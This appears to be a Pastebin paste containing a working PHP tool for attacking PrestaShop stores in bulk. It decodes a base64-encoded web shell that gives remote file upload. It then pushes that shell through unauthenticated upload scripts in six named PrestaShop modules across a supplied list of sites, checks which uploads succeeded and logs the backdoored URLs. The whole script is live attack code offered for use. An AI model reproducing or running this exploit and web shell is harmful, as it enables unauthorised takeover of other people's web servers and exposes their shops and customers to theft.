Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- set_time_limit(0);
- ini_set('display_errors', 0);
- echo '<title>PRESTASHOP | UPLOAD</title><body bgcolor=silver><center><form method="post"><center><textarea name="azx"></textarea><br>
- <br><input name="anu" type="submit" value="Submit"></form></center><br><pre>';
- if($_POST['anu']){
- $ex=explode("\r\n",$_POST['azx']);
- echo"
- \n ___ ________ ___ ___________________ ______\n / _ /_ /_ / / _ /_ __/ __/ __/ _/ |/ / __/\n / __ |/ /_/ /_/ __ |/ / _\ \_\ \_/ // /\ \ \n/_/ |_/___/___/_/ |_/_/ /___/___/___/_/|_/___/ \n \n";
- echo"\n Scan ".count($_POST['azx'])." website\n\n";
- foreach($ex as $sites){
- // Self backdoor creator
- $azouz = 'PD9waHAgaWYoaXNzZXQoJF9GSUxFU1snYXp6YXRzc2lucyddWyduYW1lJ10pKXskbmFtZSA9ICRf
- RklMRVNbJ2F6emF0c3NpbnMnXVsnbmFtZSddOyRhenggPSAkX0ZJTEVTWydhenphdHNzaW5zJ11b
- J3RtcF9uYW1lJ107QG1vdmVfdXBsb2FkZWRfZmlsZSgkYXp4LCAkbmFtZSk7IGVjaG8gJG5hbWU7
- fWVsc2V7IGVjaG8gIkFaWkFUU1NJTlMgPGJyPjxmb3JtIG1ldGhvZD1wb3N0IGVuY3R5cGU9bXVs
- dGlwYXJ0L2Zvcm0tZGF0YT48aW5wdXQgdHlwZT1maWxlIG5hbWU9YXp6YXRzc2lucz48aW5wdXQg
- dHlwZT1zdWJtaXQgdmFsdWU9Jz4+Jz4iOw==';
- $file = fopen("azx.php" ,"w+");
- $write = fwrite ($file ,base64_decode($azouz));
- chmod("azx.php",0044);
- echo " \nScaning > $sites";
- $sites=trim($sites);
- //////////// modules classes
- echo "\n\n Testing Simpleslideshow";
- $uploadfile="azx.php";
- $url = "/modules/simpleslideshow/uploadimage.php";
- $url2 = "/modules/simpleslideshow/slides/azx.php";
- $ch = curl_init("$sites.$url");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- $get1=@file_get_contents($sites.$url2);
- if(preg_match('#AZZATSSINS#',$get1)){
- echo "\n\t $sites$url2";
- $f = fopen("azx.htm","a+");
- fwrite ($f,$sites.$url2."<br>");
- fclose($f);
- } else {
- echo "\n\t Fail ";
- }
- ////////////
- echo "\n Testing Productpageadverts";
- $uploadfile2="azx.php";
- $url3 = "/modules/productpageadverts/uploadimage.php";
- $url24 = "/modules/productpageadverts/slides/azx.php";
- $ch = curl_init("$sites.$url3");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile2"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- $get12=@file_get_contents($sites.$url24);
- if(preg_match('#AZZATSSINS#',$get12)){
- echo "\n\t $sites$url24";
- $f = fopen("azx.htm","a+");
- fwrite ($f,$sites.$url24."<br>");
- fclose($f);
- } else {
- echo "\n\t Fail";
- }
- ////////////
- echo "\n Testing Columnadverts";
- $uploadfile23="azx.php";
- $url34 = "/modules/columnadverts/uploadimage.php";
- $url245 = "/modules/columnadverts/slides/azx.php";
- $ch = curl_init("$sites.$url34");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile23"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- $get123=@file_get_contents($sites.$url245);
- if(preg_match('#AZZATSSINS#',$get123)){
- echo "\n\t $sites$url245";
- $f = fopen("azx.htm","a+");
- fwrite ($f,$sites.$url245."<br>");
- fclose($f);
- } else {
- echo "\n\t Fail";
- }
- ////////////
- echo "\n Testing Homepageadvertise";
- $uploadfile234="azx.php";
- $url345 = "/modules/homepageadvertise/uploadimage.php";
- $url2456 = "/modules/homepageadvertise/slides/azx.php";
- $ch = curl_init("$sites.$url345");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile234"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- $get124=@file_get_contents($sites.$url2456);
- if(preg_match('#AZZATSSINS#',$get124)){
- echo "\n\t $sites$url2456";
- $f = fopen("azx.htm","a+");
- fwrite ($f,$sites.$url2456."<br>");
- fclose($f);
- } else {
- echo "\n\t Fail";
- }
- //////////
- echo "\n Testing Attributewizardpro";
- $uploadfile2345="azx.php";
- $url3456 = "/modules/attributewizardpro/file_upload.php";
- $url24567 = "/modules/attributewizardpro/file_uploads/azx.php";
- $ch = curl_init("$sites.$url3456");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile2345"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- $get125=@file_get_contents($sites.$url24567);
- if(preg_match('#AZZATSSINS#',$get125)){
- echo "\n\t $sites$url24567";
- $f = fopen("azx.htm","a+");
- fwrite ($f,$sites.$url24567."<br>");
- fclose($f);
- } else {
- echo "\n\t Fail";
- }
- ///////////
- echo "\n Testing Vtemslideshow";
- $uploadfile2349="azx.php";
- $url3450 = "/modules/vtemslideshow/uploadimage.php";
- $url24560 = "/modules/vtemslideshow/slides/azx.php";
- $ch = curl_init("$sites.$url3450");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, array('userfile'=>"@$uploadfile2349"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- $get1276=@file_get_contents($sites.$url24560);
- if(preg_match('#AZZATSSINS#',$get1276)){
- echo "\n\t $sites$url24560";
- $f = fopen("azx.htm","a+");
- fwrite ($f,$sites.$url24560."<br>");
- fclose($f);
- } else {
- echo "\n\t Fail \n";
- } }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement